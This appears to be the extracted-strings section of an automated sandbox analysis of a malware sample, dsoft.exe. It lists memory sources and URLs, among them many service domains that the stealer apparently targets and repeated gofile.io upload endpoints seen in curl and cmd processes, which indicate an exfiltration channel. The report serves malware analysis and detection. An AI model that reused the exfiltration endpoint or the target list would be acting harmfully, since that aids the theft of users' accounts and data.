Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2012706454.0000029488D30000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546818089.0000029488C86000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542377151.0000029488C7F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2012706454.0000029488CF1000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552670248.000002948855C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488AF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539453832.0000029488525000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C81000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540133201.0000029488535000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550213850.0000029488C88000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010117969.0000029488B32000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stake.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stake.com))
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)z
Source: cmd.exe, 00000007.00000002.2150326748.000002BBEB28B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/u
Source: cmd.exe, 00000029.00000002.2373686223.00000213A668B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/u&
Source: cmd.exe, 00000023.00000002.2337162759.0000026D4D1CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/upl
Source: cmd.exe, 0000000B.00000002.2187353551.000001C33C62B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/upli~
Source: curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002F.00000002.2377223763.00000198BF865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile
Source: curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile0
Source: curl.exe, 00000009.00000003.2149329817.0000016797613000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2149925139.0000016797614000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2149427215.00000167975E4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2149787568.00000167975E7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186534267.0000022CEC933000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.2235709997.0000021280D16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile2
Source: curl.exe, 0000000D.00000002.2186534267.0000022CEC928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileB
Source: cmd.exe, 00000011.00000002.2236871646.000001EAF2E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000026.00000002.2372004977.00000252CF160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileDRI
Source: cmd.exe, 0000000B.00000002.2187247687.000001C33C5E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileHOMEDRI
Source: cmd.exe, 00000007.00000002.2150523746.000002BBEB5F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileMEDRI
Source: cmd.exe, 0000001A.00000002.2240303625.000001A8E3F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileMEDRI_
Source: cmd.exe, 00000020.00000002.2305206433.000002B69E550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileMEDRIr?
Source: curl.exe, 00000009.00000002.2149787568.00000167975D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileTEM32
Source: cmd.exe, 00000007.00000002.2150326748.000002BBEB280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileW
Source: curl.exe, 00000009.00000002.2149787568.00000167975D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186534267.0000022CEC920000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2239967178.000001A81E8D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileWinsta0
Source: curl.exe, 00000009.00000002.2149787568.00000167975D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186534267.0000022CEC920000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2239967178.000001A81E8D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilecurl
Source: curl.exe, 0000000D.00000002.2186534267.0000022CEC928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileomBz
Source: curl.exe, 0000000D.00000003.2186153249.0000022CEC964000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2186682732.0000022CEC964000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2186047082.0000022CEC964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFiler
Source: curl.exe, 0000000D.00000002.2186534267.0000022CEC928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilerigz
Source: curl.exe, 0000002E.00000002.2374793951.000001BA62A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFiles
Source: dsoft.exe, 00000001.00000003.2251567810.00000294898CC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251521232.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539962337.00000294898CD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.00000294898AC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540569471.00000294898D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterP
Source: dsoft.exe, 00000001.00000002.2571777281.000002948A684000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.000002948988D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2449381724.000001FA5CEBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: dsoft.exe, 00000001.00000002.2570386727.00000294898CE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251567810.00000294898CC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251521232.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539962337.00000294898CD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.00000294898AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: dsoft.exe, 00000001.00000003.2251567810.00000294898CC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251521232.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2571777281.000002948A660000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539962337.00000294898CD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.00000294898AC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.000002948988D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540569471.00000294898D3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2449381724.000001FA5CEBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: dsoft.exe, 00000001.00000002.2571777281.000002948A660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170
Source: dsoft.exe, 00000001.00000002.2570386727.00000294898CE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251567810.00000294898CC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251521232.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251226589.00000294898BF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539962337.00000294898CD000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534412343.00000294898AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)z
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/badges/github/pypa/setuptools?style=flat
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/security
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=readme
Source: dsoft.exe, 00000000.00000003.1992978647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166912378.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)z
Source: dsoft.exe, 00000001.00000003.2548967761.000002948857A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539453832.0000029488525000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541993942.0000029488565000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540133201.0000029488535000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546699012.0000029488567000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685843835.000001FA5BAB9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2689060049.000001FA5BAB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: dsoft.exe, 00000001.00000003.2545732531.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550665354.0000029488ADF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895D3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679719201.000001FA5B864000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686149501.000001FA5B865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554394468.00000294896EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.00000294896C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.00000294896BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535176513.00000294896CB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2693037493.000001FA5CE24000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677159398.000001FA5CD10000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE15000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2602033242.000001FA5CE24000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2697557722.000001FA5CD2E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)z
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551023834.0000029488D52000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D44000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538502923.0000029488D43000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548120060.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2563474626.0000029488200000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549984820.0000029488D4F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)z
Source: dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://upload.pypi.org/legacy/
Source: dsoft.exe, 00000001.00000003.2557709314.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535420058.0000029488DD9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535331948.0000029488DCC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567431865.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2557121701.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539030193.0000029488DF3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535501863.0000029488DEA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyp
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: dsoft.exe, 00000001.00000003.2536991819.0000029486172000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546618302.00000294861B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539619903.0000029486184000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677558955.000001FA5BACC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679295806.000001FA596B6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2185649378.000001FA5BB40000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BAC6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2188458785.000001FA5BB40000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2687166926.000001FA5BB53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: dsoft.exe, 00000001.00000002.2569758570.00000294897B8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551581637.0000029489712000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551408444.000002948970C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554512563.0000029489788000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552554927.0000029489779000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546460014.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2602623874.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2450722331.000001FA5CDA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2164088511.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: dsoft.exe, 00000001.00000003.2537777125.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540604780.0000029488C28000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2544679008.0000029488C37000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C1F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2678643539.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488D44000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538502923.0000029488D43000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548120060.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546659014.0000029488D4A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2696286326.000001FA5CD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: dsoft.exe, 00000000.00000003.1987447167.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565697167.0000029488620000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2161847720.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: dsoft.exe, 00000001.00000002.2563065395.0000029487DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)z
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)z
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2546117734.0000029488C7D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551136597.00000294884B3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2553471547.00000294884BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C13E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676516271.000001FA5C17A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 